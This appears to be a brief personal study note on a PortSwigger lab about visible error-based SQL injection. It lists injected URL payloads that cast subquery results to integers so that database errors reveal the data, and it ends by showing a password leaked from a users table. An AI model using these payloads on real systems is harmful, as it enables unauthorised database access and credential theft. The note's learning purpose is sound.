leyamir/port_swigger/Visible error-based SQL injection.md

 1. return **ERROR: UNION types character varying and integer cannot be matched** mean id's type is character while 1 is type of integer

+`http://domain.com/index.php?id=1' and 1=cast((select 'abc') as int)--`

+1. ERROR: invalid input syntax for type integer: "abc".
+Notice that the string abc is show in the error
+2. Try to select the password

+`http://domain.com/index.php?id=1' and 1=cast((select password from users limit 1) as int)--`

+1. ERROR: invalid input syntax for type integer: "gvq5xw5rszwpbbst7ksl".
+The value of password is shown